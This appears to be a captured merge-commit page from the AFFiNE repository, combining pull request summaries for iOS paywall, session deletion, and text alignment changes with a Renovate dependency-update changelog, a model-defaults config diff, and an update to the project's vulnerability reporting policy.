subscription products, improving maintainability and consistency.
(`PricingConfiguration.swift`, `SKUnit+Pro.swift`, `SKUnit+AI.swift`)
[[1]](diffhunk://#diff-de4566ecd5bd29f36737ae5e5904345bd1a5c8f0a73140c3ebba41856bae3e86R1-R54)
[[2]](diffhunk://#diff-ea535c02550f727587e74521da8fd90dec23cbe3c685f9c4aa4923ce0bbdb363L19-R35)
[[3]](diffhunk://#diff-a5fef660f959bbb52ce3f19bba8bfbd0bb00d66c9f18a20a998101b5df6c8f60L18-R22)
**Developer Experience and Documentation**
* Added `AGENTS.md` to provide comprehensive guidance for Claude Code
and developers, including project overview, build commands,
architecture, native bridge APIs, Swift code style, and dependencies.
(`AGENTS.md`)
* Added a local settings file (`settings.local.json`) to configure
permissions for Claude Code, allowing specific Bash commands for iOS
builds. (`settings.local.json`)
* Updated Swift architecture guidelines to discourage protocol-oriented
design unless necessary, favoring dependency injection and composition.
(`AGENTS.md`)
**User Experience Improvements**
* The purchase footer now includes an underline for "Restore Purchase"
and a clear message about subscription auto-renewal and cancellation
flexibility. (`PurchaseFooterView.swift`)
* Improved restore purchase and App Store sync logic to better handle
user sign-in prompts and error handling. (`ViewModel+Action.swift`,
`Store.swift`)
[[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL45-R49)
[[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL58-R73)
[[3]](diffhunk://#diff-9f18fbbf15591c56380ce46358089c663ce4440f596db8577de76dc6cd306b54R26-R28)
**Minor Fixes and Refactoring**
* Made `docId` in `DeleteSessionInput` optional to match GraphQL schema
expectations. (`DeleteSessionInput.graphql.swift`)
[[1]](diffhunk://#diff-347e5828e46f435d7d7090a3e3eb7445af8c616f663e8711cd832f385f870a9bL14-R14)
[[2]](diffhunk://#diff-347e5828e46f435d7d7090a3e3eb7445af8c616f663e8711cd832f385f870a9bL25-R25)
* Minor formatting and dependency list updates in `Package.swift`.
(`Package.swift`)
* Fixed concurrency usage in event streaming for chat manager.
(`ChatManager+Stream.swift`)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* New Features
* Paywall options now dynamically reflect product data with clearer
labels and monthly price calculations.
* Added an auto‑renewal note (“cancel anytime”) and underlined “Restore
Purchase” for better clarity.
* Refactor
* Improved purchase/restore flow reliability and UI updates for a
smoother experience.
* Documentation
* Added a comprehensive development guide and updated architecture/style
guidance for iOS.
* Chores
* Introduced local build permissions configuration for iOS development.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- Style
- Updated icon picker to use the primary icon color, improving visual
consistency (including SVG icons).
- Improved emoji rendering in the document icon picker by applying an
emoji-specific font for elements marked as emoji, matching existing size
and line-height.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<img width="411" height="205" alt="截屏2025-09-26 10 58 39"
src="https://github.com/user-attachments/assets/c3bce144-7847-4794-b766-5a3777cbc00d"
/>
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- New Features
- Delete icon added to AI session history with tooltip and confirmation
prompt; deleting current session opens a new session.
- Session deletion wired end-to-end (toolbar → provider → backend) and
shows notifications.
- Improvements
- Cleanup now supports deleting sessions with or without a document ID
(document-specific or workspace-wide).
- UI tweaks for cleaner session item layout and safer click handling
(delete won’t trigger item click).
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- New Features
- Access Tokens screen now shows revealed access tokens, including the
token value where available.
- Chores
- Updated iOS Paywall package to use Swift tools version 5.9.
- Removed an unused internal iOS package to streamline the app.
- Aligned access token data model to the latest backend schema for
improved consistency.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
Fix#13649
#### PR Dependency Tree
* **PR #13653** 👈
This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Refactor**
* Streamlined internal async handling to depend only on specified
inputs, reducing unnecessary updates and improving responsiveness.
* Preserved existing error handling for async operations.
* **Chores**
* Adjusted lint configuration/comments to align with the updated
dependency strategy, reducing false-positive warnings.
No user-facing UI changes.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
https://github.com/toeverything/AFFiNE/issues/13509
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Upgraded Mermaid dependency to v11.1.0 in the frontend core package.
* **Impact**
* Improved diagram rendering and compatibility with newer Mermaid
syntax.
* Potential performance and security improvements from upstream updates.
* No UI changes expected; existing diagrams should continue to work.
* Please verify critical diagram views for any rendering differences.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
---------
Co-authored-by: L-Sun <zover.v@gmail.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
for paragraph blocks, image blocks, list blocks, and table blocks
Should fix#8617 and #11254.
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
- **New Features**
- Added text alignment options (left, center, right) for paragraph,
list, image, note, and table blocks.
- Introduced alignment controls in toolbars and slash menus for easier
formatting.
- Enabled keyboard shortcuts for quick text alignment changes (supports
Mac and Windows).
- **Localization**
- Added English, Simplified Chinese, and Traditional Chinese
translations for new alignment commands and shortcuts.
- **Style**
- Blocks now visually reflect selected text alignment in their layout.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
---------
Co-authored-by: L-Sun <zover.v@gmail.com>
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs
from Renovate will soon appear from 'Mend'. Learn more
[here](https://redirect.github.com/renovatebot/renovate/discussions/37842).
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
|
[@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client)
| [`^28.0.0` ->
`^31.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/28.0.1/31.0.0)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
---
### Release Notes
<details>
<summary>googleapis/google-api-nodejs-client
(@​googleapis/androidpublisher)</summary>
###
[`v31.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13100-2024-01-05)
[Compare
Source](https://redirect.github.com/googleapis/google-api-nodejs-client/compare/v30.0.0...v31.0.0)
##### ⚠ BREAKING CHANGES
- **serviceconsumermanagement:** This release has breaking changes.
- **playintegrity:** This release has breaking changes.
##### Features
- **chromepolicy:** update the API
([8429e3c](8429e3c9d6))
- **chromeuxreport:** update the API
([6d52abb](6d52abb902))
- **customsearch:** update the API
([1169e4c](1169e4c607))
- **dialogflow:** update the API
([4b1e073](4b1e0734d9))
- **displayvideo:** update the API
([45b61b5](45b61b5d20))
- **oslogin:** update the API
([cfc90e7](cfc90e7c9c))
- **playintegrity:** update the API
([767af5f](767af5f12e))
- regenerate index files
([4246fd1](4246fd1c64))
- **serviceconsumermanagement:** update the API
([a68206a](a68206a211))
##### Bug Fixes
- **accesscontextmanager:** update the API
([845c716](845c7168e9))
- **admin:** update the API
([4664d6b](4664d6bb4c))
- **backupdr:** update the API
([19b0192](19b019219b))
- **calendar:** update the API
([0ca9bbc](0ca9bbc4e4))
- **cloudbuild:** update the API
([31158a2](31158a226c))
- **cloudidentity:** update the API
([22610b3](22610b3d15))
- **cloudprofiler:** update the API
([2c5cbc4](2c5cbc4299))
- **cloudtrace:** update the API
([2a811d5](2a811d5fe8))
- **iap:** update the API
([ec596c1](ec596c1b87))
- **playdeveloperreporting:** update the API
([7181840](7181840daf))
- **servicenetworking:** update the API
([50c7dbd](50c7dbd323))
- **spanner:** update the API
([0e40d67](0e40d67436))
###
[`v30.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13000-2024-01-03)
##### ⚠ BREAKING CHANGES
- **networksecurity:** This release has breaking changes.
- **metastore:** This release has breaking changes.
- **gmail:** This release has breaking changes.
- **gkehub:** This release has breaking changes.
- **drivelabels:** This release has breaking changes.
- **dialogflow:** This release has breaking changes.
- **datacatalog:** This release has breaking changes.
- **content:** This release has breaking changes.
- **connectors:** This release has breaking changes.
- **cloudbuild:** This release has breaking changes.
- **chat:** This release has breaking changes.
- **batch:** This release has breaking changes.
- **artifactregistry:** This release has breaking changes.
- **aiplatform:** This release has breaking changes.
- **advisorynotifications:** This release has breaking changes.
##### Features
- **accesscontextmanager:** update the API
([26d496e](26d496e416))
- **adexchangebuyer2:** update the API
([31c0066](31c006606f))
- **admin:** update the API
([79ce913](79ce9133d7))
- **advisorynotifications:** update the API
([0f44091](0f440919dd))
- **aiplatform:** update the API
([66739ce](66739ce624))
- **alloydb:** update the API
([590f835](590f835773))
- **analyticsdata:** update the API
([25d0b67](25d0b6763e))
- **analyticshub:** update the API
([8279edf](8279edf154))
- **androidpublisher:** update the API
([c6d69a0](c6d69a049d))
- **artifactregistry:** update the API
([6fda22c](6fda22c487))
- **assuredworkloads:** update the API
([41debeb](41debeba59))
- **backupdr:** update the API
([1018945](1018945770))
- **batch:** update the API
([9ef21e0](9ef21e0459))
- **bigquery:** update the API
([f1deeab](f1deeabbb0))
- **blockchainnodeengine:** update the API
([07ac2e7](07ac2e721d))
- **chat:** update the API
([88428f0](88428f0d91))
- **checks:** update the API
([2d78a72](2d78a72c71))
- **cloudbilling:** update the API
([857a51e](857a51e47b))
- **cloudbuild:** update the API
([ddf4c10](ddf4c10cf4))
- **cloudchannel:** update the API
([aecac6b](aecac6be45))
- **clouddeploy:** update the API
([62d7fd6](62d7fd6070))
- **cloudfunctions:** update the API
([c5aae9a](c5aae9a7cf))
- **cloudprofiler:** update the API
([2933bff](2933bff415))
- **cloudsupport:** update the API
([feb88b5](feb88b5521))
- **composer:** update the API
([53b83d6](53b83d65b1))
- **compute:** update the API
([ffbf00b](ffbf00b1c1))
- **connectors:** update the API
([f433bd6](f433bd6284))
- **container:** update the API
([cac432f](cac432f882))
- **content:** update the API
([c0dd4c0](c0dd4c0bc2))
- **datacatalog:** update the API
([a939d7e](a939d7eaf2))
- **dataflow:** update the API
([9721cda](9721cda955))
- **dataform:** update the API
([d2bfeab](d2bfeabcbe))
- **datafusion:** update the API
([413c94e](413c94e5db))
- **dataplex:** update the API
([8da4b12](8da4b128b1))
- **dataproc:** update the API
([5a60626](5a606262b3))
- **dialogflow:** update the API
([8829da4](8829da4a7e))
- **discoveryengine:** update the API
([567c02d](567c02d288))
- **dlp:** update the API
([7cbdc6a](7cbdc6aaf4))
- **dns:** update the API
([f783244](f7832440a5))
- **documentai:** update the API
([01cc7b5](01cc7b5994))
- **drivelabels:** update the API
([50a1b75](50a1b75751))
- **drive:** update the API
([c07f193](c07f193c33))
- **file:** update the API
([324d0f6](324d0f69b3))
- **firebaseappcheck:** update the API
([c8fb050](c8fb050246))
- **firebaserules:** update the API
([2a44570](2a445705f0))
- **gkehub:** update the API
([044e086](044e0861ed))
- **gkeonprem:** update the API
([6c9398e](6c9398e54e))
- **gmail:** update the API
([c7698bd](c7698bda1d))
- **healthcare:** update the API
([d34ee61](d34ee618f9))
- **metastore:** update the API
([6887f67](6887f67506))
- **migrationcenter:** update the API
([e890439](e890439ac6))
- **monitoring:** update the API
([738848d](738848dcb6))
- **networkmanagement:** update the API
([d8a3556](d8a35563fc))
- **networksecurity:** update the API
([166232f](166232fe14))
- **networkservices:** update the API
([076de17](076de17ce5))
- **notebooks:** update the API
([a08d104](a08d104800))
- **orgpolicy:** update the API
([5c8f8c7](5c8f8c727c))
- **oslogin:** update the API
([f1475c5](f1475c544f))
- **paymentsresellersubscription:** update the API
([d79cf5a](d79cf5a6cf))
- **playdeveloperreporting:** update the API
([6ef5718](6ef5718e6e))
- **policysimulator:** update the API
([58e6545](58e654547c))
- **prod\_tt\_sasportal:** update the API
([99b92fe](99b92fe5d9))
- **pubsub:** update the API
([f17fac3](f17fac34c0))
- **recaptchaenterprise:** update the API
([7952baa](7952baabbe))
- **recommender:** update the API
([76b9501](76b9501327))
- **redis:** update the API
([fd4636b](fd4636b1c9))
- regenerate index files
([33f2d78](33f2d78b2c))
- **retail:** update the API
([0aa095b](0aa095b51a))
- **run:** update the API
([48a19bf](48a19bf416))
- **sasportal:** update the API
([2459cce](2459cce1e4))
- **script:** update the API
([0520e5e](0520e5efd5))
- **securitycenter:** update the API
([74c634a](74c634a34a))
- **serviceconsumermanagement:** update the API
([0552119](05521190fe))
- **servicemanagement:** update the API
([429940b](429940b1b4))
- **servicenetworking:** update the API
([42a1422](42a142249e))
- **serviceusage:** update the API
([c2ad070](c2ad070ce4))
- **storage:** update the API
([c0609c9](c0609c901b))
- **translate:** update the API
([77a0522](77a05229d2))
- **vault:** update the API
([db163fd](db163fd3b3))
- **vision:** update the API
([77a0a91](77a0a9136e))
- **vpcaccess:** update the API
([8db5275](8db52757e6))
- **workloadmanager:** update the API
([4c49597](4c4959752e))
- **workstations:** update the API
([174cd20](174cd20129))
##### Bug Fixes
- **accessapproval:** update the API
([227915d](227915d92f))
- **analyticsadmin:** update the API
([b858170](b858170642))
- **androidmanagement:** update the API
([35f8862](35f886254c))
- **apphub:** update the API
([e5a7c92](e5a7c92a2a))
- **binaryauthorization:** update the API
([7f20317](7f20317264))
- **calendar:** update the API
([e6ba462](e6ba462408))
- **chromepolicy:** update the API
([a5a5351](a5a5351998))
- **classroom:** update the API
([9d2ed12](9d2ed12202))
- **cloudasset:** update the API
([20a91d5](20a91d5cb6))
- **cloudidentity:** update the API
([5155e11](5155e11cd2))
- **cloudkms:** update the API
([90bab2c](90bab2c738))
- **cloudscheduler:** update the API
([2c7b902](2c7b90229a))
- **cloudtasks:** update the API
([a8d66db](a8d66db055))
- **contactcenterinsights:** update the API
([828c5d3](828c5d3e08))
- **datamigration:** update the API
([56a65a8](56a65a8590))
- **deploymentmanager:** update the API
([b48abef](b48abef098))
- **displayvideo:** update the API
([299cf97](299cf97f91))
- **firebaseappdistribution:** update the API
([b102fcc](b102fccab5))
- **gkebackup:** update the API
([30ca612](30ca612728))
- **iam:** update the API
([4e12124](4e121245a3))
- **iap:** update the API
([65c644e](65c644e9de))
- **language:** update the API
([77252e1](77252e1b9c))
- **logging:** update the API
([1b4dc67](1b4dc6732c))
- **mybusinessbusinessinformation:** update the API
([5e4c0fe](5e4c0fe093))
- **places:** update the API
([6bbdf72](6bbdf72e3e))
- **policytroubleshooter:** update the API
([ad18f3b](ad18f3b0f6))
- **privateca:** update the API
([b230959](b23095912e))
- **runtimeconfig:** update the API
([0dfe961](0dfe9610eb))
- **secretmanager:** update the API
([a202268](a202268db9))
- **servicedirectory:** update the API
([ddc06a2](ddc06a219b))
- **sourcerepo:** update the API
([1965102](19651026ae))
- **spanner:** update the API
([ce99980](ce99980e71))
- **sqladmin:** update the API
([de59e8d](de59e8dd22))
- **storagetransfer:** update the API
([d6081de](d6081dea7d))
- **videointelligence:** update the API
([9d377f5](9d377f5e3e))
- **vmmigration:** update the API
([68a1d5f](68a1d5fede))
- **walletobjects:** update the API
([920ddc7](920ddc780c))
- **workflowexecutions:** update the API
([6553987](6553987f65))
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2025-09-26 07:18:12 +00:00
305 changed files with 5967 additions and 2283 deletions
"description":"Use custom models in scenarios and override default settings.\n@default {\"override_enabled\":false,\"scenarios\":{\"audio_transcribing\":\"gemini-2.5-flash\",\"chat\":\"gemini-2.5-flash\",\"embedding\":\"gemini-embedding-001\",\"image\":\"gpt-image-1\",\"rerank\":\"gpt-4.1\",\"coding\":\"claude-sonnet-4@20250514\",\"complex_text_generation\":\"gpt-4o-2024-08-06\",\"quick_decision_making\":\"gpt-5-mini\",\"quick_text_generation\":\"gemini-2.5-flash\",\"polish_and_summarize\":\"gemini-2.5-flash\"}}",
"description":"Use custom models in scenarios and override default settings.\n@default {\"override_enabled\":false,\"scenarios\":{\"audio_transcribing\":\"gemini-2.5-flash\",\"chat\":\"gemini-2.5-flash\",\"embedding\":\"gemini-embedding-001\",\"image\":\"gpt-image-1\",\"rerank\":\"gpt-4.1\",\"coding\":\"claude-sonnet-4-5@20250929\",\"complex_text_generation\":\"gpt-4o-2024-08-06\",\"quick_decision_making\":\"gpt-5-mini\",\"quick_text_generation\":\"gemini-2.5-flash\",\"polish_and_summarize\":\"gemini-2.5-flash\"}}",
@@ -6,12 +6,12 @@ We recommend users to always use the latest major version. Security updates will
| Version | Supported |
| --------------- | ------------------ |
| 0.17.x (stable) | :white_check_mark: |
| < 0.17.x | :x: |
| 0.24.x (stable) | :white_check_mark: |
| < 0.24.x | :x: |
## Reporting a Vulnerability
We welcome you to provide us with bug reports via and email at [security@toeverything.info](mailto:security@toeverything.info). We expect your report to contain at least the following for us to evaluate and reproduce:
We welcome you to provide us with bug reports via and email at [security@toeverything.info](mailto:security@toeverything.info) or submit directly on [GitHub](https://github.com/toeverything/AFFiNE/security), **we encourage you to submit the relevant information directly via GitHub**. We expect your report to contain at least the following for us to evaluate and reproduce:
1. Using platform and version, for example:
@@ -22,8 +22,6 @@ We welcome you to provide us with bug reports via and email at [security@toevery
3. Your classification or analysis of the vulnerability (optional)
Since we are an open source project, we also welcome you to provide corresponding fix PRs.
We will provide bounties for vulnerabilities involving user information leakage, permission leakage, and unauthorized code execution. For other types of vulnerabilities, we will determine specific rewards based on the evaluation results.
Since we are an open source project, we also welcome you to provide corresponding fix PRs, we will determine specific rewards based on the evaluation results.
If the vulnerability is caused by a library we depend on, we encourage you to submit a security report to the corresponding dependent library at the same time to benefit more users.
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.
